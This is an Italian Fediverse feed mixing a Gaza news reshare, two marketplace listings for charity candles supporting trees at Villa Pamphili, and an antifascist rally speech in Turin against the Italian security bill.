@Notizie dall'Italia e dal mondo
I soccorritori riferiscono che i civili rappresentano la gran parte delle vittime. "E' un bagno di sangue".
L'articolo Israele attacca Gaza, centinaia di palestinesi uccisi proviene da Pagine Esteri.
Notizie dall'Italia e dal mondo reshared this.
💛 Candela cuore , profumata , gialla Pro Salvataggio alberi🌲🌲 via Pamphili - Questo è un post automatico da FediMercatino.it
Prezzo: 14 € euro
💛 Candela cuore , profumata , gialla
💛 Candela cuore , profumata , gialla , centrotavola segnaposto , gadget feste .
Misure 13 x 8 cm spessore 3 cm
Link diretto all'acquisto su subito 🛒👇
subito.it/arredamento-casaling…
Con l’acquisto di questo articolo
Puoi devolvere il 50% del costo di questo articolo a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
Si prega di contattarmi
NB: il 50% del costo di questo articolo potrai devolverlo
per sostenere le spese per il ricorso al Tar a favore del salvataggio degli alberi promossa dal Neomondismo
Sostieni le spese per il ricorso al TAR!
a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
pertanto se avrai aderito alla donazione il costo finale dell’articolo sarà pari al 50% del costo
💛 Heart candle, scented, yellow, centerpiece placeholder, party gadget.
💛 Bougie en forme de cœur, parfumée, jaune, pièce maîtresse, gadget de fête.
💛 Herzkerze, duftend, gelb, Platzhalter für Tafelaufsätze, Party-Gadget.
💛 Vela de corazón, perfumada, amarilla, marcador de posición central, accesorio para fiesta.
💛 Vela coração, perfumada, amarela, espaço reservado para mesa central, acessório de festa.
💛 Hartvormige kaars, geurend, geel, als middelpunt, als feestgadget.
💛 Häerz Käerz, parfüméierter, giel, zentrale Plazhalter, Party Gadget.
💛 Świeca w kształcie serca, zapachowa, żółta, jako ozdoba centralnej części stołu, gadżet na imprezę.
💛 Hjärtljus, doftljus, gult, platshållare i mitten, festpryl.
💛 Sviečka v tvare srdca, voňavá, žltá, stredový držiak, párty gadget.
💛 Sveča v obliki srca, dišeča, rumena, nadomestni element v središču, pripomoček za zabavo.
💛 Svijeća u obliku srca, mirisna, žuta, središnji držač mjesta, gadget za zabavu.
💛 Hjertelys, duft, gul, midterste pladsholder, festgadget.
💛 Sydänkynttilä, tuoksukynttilä, keltainen, keskipistepaikkamerkki, juhlavempain.
#candelaartistica
#candelagadgetfesta #candeladecorativa#candelacentrotavola #candelasegnaposto
#candelaprofumatacuore #candelacuoregiallo #candelaprofumata
#decorazionecasa #decorazioneambientibenessere
Price: 14 € euro :: Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.
Per informazioni su fedimercatino Fedimercatino: Chi siamo
Il Mercatino del Fediverso 💵♻️ reshared this.
🌲Candela Pino ,Abete verde Pro salvataggio Alberi 🌲🌲 Villa Pamphili Roma - Questo è un post automatico da FediMercatino.it
Prezzo: 16 € euro
🎄Candela Pino ,abete verde , albero natalizio, Decorazione centrotavola feste
Candela Pino Abete con base in legno naturale . Composizione cera , legno .Kiefern-Tannenkerze
📏Lungo 18 cm , base 9 cm
👉Disponibili 2 candele Abeti verdi
Link diretto all'acquisto su subito 🛒👇
subito.it/arredamento-casaling…
Con l’acquisto di questo articolo
Puoi devolvere il 50% del costo di questo articolo a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
Si prega di contattarmi
NB: il 50% del costo di questo articolo potrai devolverlo
per sostenere le spese per il ricorso al Tar a favore del salvataggio degli alberi promossa dal Neomondismo
Sostieni le spese per il ricorso al TAR!
a favore del salvataggio degli ALBERI di Villa PAMPHIILJ ROMA
pertanto se avrai aderito alla donazione il costo finale dell’articolo sarà pari al 50% del costo
🌲 Pine Fir Candle with natural wood base.
🌲 Bougie en pin et sapin avec base en bois naturel
🌲 Kiefern-Tannenkerze mit natürlichem Holzsockel
🌲 Vela em pinho com base em madeira natural
🌲 Vela de pino abeto con base de madera natural
🌲 Dennenkaars met natuurlijke houten voet
🌲 Pine Fir Käerz mat Naturholz Basis
🌲 Świeca sosnowa z naturalną drewnianą podstawą
Price: 16 € euro :: Questo è un articolo disponibile su FediMercatino.it
Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.
Per informazioni su fedimercatino Fedimercatino: Chi siamo
Il Mercatino del Fediverso 💵♻️ reshared this.
di Alessandra Algostino -
L’iniziativa di oggi è promossa dal coordinamento antifascista di Torino, che riunisce associazioni nazionali e locali, sindacati, centri sociali, comitati, ed ha visto l’adesione di moltissime realtà cittadine, tante, troppe, per citarle tutte, ben 46 sigle – che si riconoscono nella storia di diritti, libertà, uguaglianza affermati con la Resistenza e scritti nella Costituzione. Un segnale di speranza contro il clima di paura che veicola il disegno di legge sicurezza.
Il coordinamento antifascista nasce da un «dobbiamo reagire» – cito dal Manifesto istitutivo – per «difendere e praticare, in ogni occasione, la visione antifascista, internazionalista, egualitaria, multiculturale, pluralista e pacifista della Costituzione».
È in nome di questa visione che oggi siamo qui in piazza a contrastare il disegno di legge sicurezza e, insieme, il clima bellico, che genera e dal quale è generato: autoritarismo e guerra si alimentano a vicenda.
È un disegno che infittisce una tela repressiva ordita nel corso degli anni (legge sulla sicurezza n. 94 del 2009, governo Berlusconi; pacchetto “Minniti”, 2017; decreti Salvini, 2018-2019); un provvedimento in grado di oscurare lo spazio democratico di tutti noi; una deriva autoritaria che neutralizza la democrazia politica e quella sociale.
La sicurezza, come sicurezza dei diritti, sociale, sul lavoro, è sostituita dalla sicurezza come ordine pubblico; la valorizzazione della partecipazione e del dissenso come necessario in una democrazia (Bobbio) si muta in stigmatizzazione e repressione della critica e dell’agire alternativo.
La distanza dalla Costituzione è siderale: dalla democrazia conflittuale allo stato autoritario; dallo stato sociale allo stato penale; dall’emancipazione alla criminalizzazione; dall’inclusione all’espulsione; dalla partecipazione effettiva all’obbedienza all’autorità; dall’orizzonte aperto del pluralismo alla logica identitaria escludente del nemico.
La divergenza politica e sociale, gli eccedenti, coloro che vivono ai margini, sono i nemici. Tanti i sottintesi che questo porta con sé: il conflitto sociale non esiste e non ha titolo di esistere; le radici delle diseguaglianze sociali e della devastazione ambientale sono oggetto di un transfert che le addossa a chi le subisce e a chi le contesta; si crea uno stato di permanente emergenza e distrazione.
Si blinda l’esistente e si sterilizzano le sue contraddizioni.
Non voglio annoiarvi, ma provo a raccontarvi qualcuna delle norme del disegno di legge.
L’articolo 14 prevede che sia punito «l’impedimento alla libera circolazione su strada», ovvero il blocco esercitato con il proprio corpo (con la pena della reclusione da sei mesi a due anni, se compiuto, come è normale, da più persone).
Il blocco stradale (e ferroviario) è un mezzo attraverso il quale si esprimono il dissenso, il disagio sociale, il conflitto nel mondo del lavoro, le proteste studentesche: è strettamente correlato all’esercizio di diritti fondamentali, costituzionalmente garantiti, come lo sciopero (art. 40), la riunione (art. 17) e la manifestazione del pensiero (art. 21).
Il significato ideologico della stigmatizzazione e dell’attrazione nell’universo penale del diritto di protesta si coniuga con la repressione concreta e produce un effetto deterrente e dissuasivo. È un’intimidazione istituzionale del dissenso.
Gli articoli 26 e 27 del disegno di legge, nel punire la «rivolta all’interno di un istituto penitenziario», ma anche in una struttura di accoglienza e trattenimento per i migranti (un CPR, un CAS, un hotspot), annoverano fra gli atti di resistenza «anche le condotte di resistenza passiva».
Da un lato, si toglie ancora voce a persone fragili, detenuti e migranti, che hanno pochissime possibilità di farsi sentire; dall’altro lato, confidando nel minor allarme sociale destato da provvedimenti destinati a persone tenute ai margini della società, si sperimenta e nel contempo si normalizza l’idea che la resistenza passiva, ovvero la disobbedienza nonviolenta, sia penalmente perseguibile (facile pensare agli eco-attivisti).
Ma non solo il dissenso è reato, lo sono anche la povertà e il disagio sociale. L’articolo 10 del disegno di legge introduce il nuovo reato, ridondante e dalla forte caratura simbolica, di «occupazione arbitraria di immobile destinato a domicilio altrui». A fronte del grave problema sociale della casa, il legislatore non persegue politiche atte a garantire a tutti l’accesso all’abitazione – diritto che la Corte costituzionale qualifica inviolabile – ma adotta un approccio punitivo (e la pena non è lieve, da due a sette anni, come per l’omicidio colposo sul lavoro). Stessa pena è prevista anche per coloro che si intromettono o cooperano, ovvero che agiscono in solidarietà.
Il principio costituzionale di solidarietà (art. 2), nell’era Meloni, tra neoliberismo, autonomia differenziata e nazionalismo identitario, scompare dall’orizzonte.
In linea con la disumanizzazione dei migranti tra confinamenti ed esternalizzazione delle frontiere, è quindi la norma, dal chiaro tenore razzista, che prevede l’obbligo, per la vendita della scheda elettronica (S.I.M.), «se il cliente è cittadino di uno Stato non appartenente all’Unione europea», di acquisire copia del titolo di soggiorno (art. 32 ddl).
Infine, a chiudere il cerchio, c’è l’istituzione di privilegi dell’autorità, con la creazione di un vero e proprio corredo di benefit per le forze di polizia: aggravanti in materia di violenza o minaccia, tutele rafforzate, pagamento di spese legali, facilitazioni nell’ottenere la licenza d’armi.
Si fa strada l’idea di uno stato fondato sull’autorità e sull’obbedienza: orizzonti estranei alla democrazia, che si fonda, imprescindibilmente, sulla partecipazione e sull’uguaglianza, sulla «pari dignità sociale» (art. 3 Cost.), sul pluralismo e sul conflitto.
L’uguaglianza come connotato del diritto proprio di una democrazia cede il passo a diritti speciali: da un lato, il diritto speciale del migrante, di chi vive ai margini, di chi dissente; e, dall’altro, il diritto speciale di chi rappresenta l’autorità.
Diritto del nemico e diritto dell’amico; disumano e super-umano. Il nemico è stigmatizzato e criminalizzato, espulso; l’amico, che veicola l’immagine dell’autorità, è celebrato e oggetto di franchigie e benefici.
La dicotomia amico/nemico rende evidente come la lotta contro il disegno di legge sicurezza si leghi al contrasto alla logica della guerra, alla spirale suicida del si vis pacem para bellum, se vuoi la pace prepara la guerra; alla guerra si accompagna l’autoritarismo, come diceva Calamandrei, e viceversa.
Il no al ddl sicurezza si accompagna, dunque, al no alla guerra, al no al riarmo.
Gastone Cottino, partigiano, mancato il 4 gennaio 2024, alla cui volontà ed energia è debitore il coordinamento antifascista, ricordava l’alleanza fra i signori della guerra, i signori dell’economia e i signori della politica: contro questa collusione perversa, che possiamo definire un “neoliberismo autoritario”, rivendichiamo i diritti e la pace.
Rivendichiamo diritti e pace per tutti e tutte. Concretizzo. Questo a Torino, oggi, ad una settimana dalla sua possibile riapertura, significa anche opporsi al CPR di corso Brunelleschi, dove è stato lasciato morire Moussa Balde e dove la dignità e i diritti di tanti sono stati violati.
Chiudo.
Lo stato diseguale e autoritario del disegno di legge sicurezza uccide l’anima della Costituzione, che ha nel suo cuore la persona, la sua dignità e la sua emancipazione; chiude per tutte e tutti noi spazi di democrazia. Fermiamolo.
Apriamo squarci nella tela oscura che si stende sulla democrazia; alla paura opponiamo la speranza, la speranza come ottimismo militante (Bloch), come forza sociale; diritti, libertà e conflitto rendono concreto e possibile mantenere aperto l’orizzonte aperto della trasformazione.
Con un «non arrendetevi mai» si chiude un piccolo e prezioso libro di Gastone Cottino dal titolo indicativo “All’armi son fascisti”: la festa di oggi, per dire sì alle libertà e ai diritti e no alla paura, vuole essere un modo per non arrendersi.
Torino, 15 marzo 2025. In piazza senza paura.Sì alla libertà e ai diritti
di Alessandra Algostino - L’iniziativa di oggi è promossa dal coordinamento antifascista di Torino, che riunisce associazioni nazionali e locali, sindacatRifondazione Comunista
Antonio Marano
in reply to Nicola Pizzamiglio • • •Nicola Pizzamiglio likes this.
Arte e Cultura reshared this.
Nicola Pizzamiglio
in reply to Antonio Marano • •Arte e Cultura reshared this.